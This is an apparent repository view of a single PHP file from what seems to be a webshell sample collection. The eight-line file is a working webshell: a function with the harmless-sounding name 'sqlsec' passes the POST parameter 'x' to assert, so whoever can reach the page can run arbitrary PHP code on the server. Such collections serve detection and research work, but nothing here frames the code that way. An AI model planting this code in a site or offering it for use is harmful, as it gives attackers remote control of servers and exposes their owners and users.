webshell/php/2020.08.20.05.php

8 lines
87 B
PHP
Raw Normal View History

<?php
function sqlsec($a){
$a($_POST['x']);
}
sqlsec(assert);
?>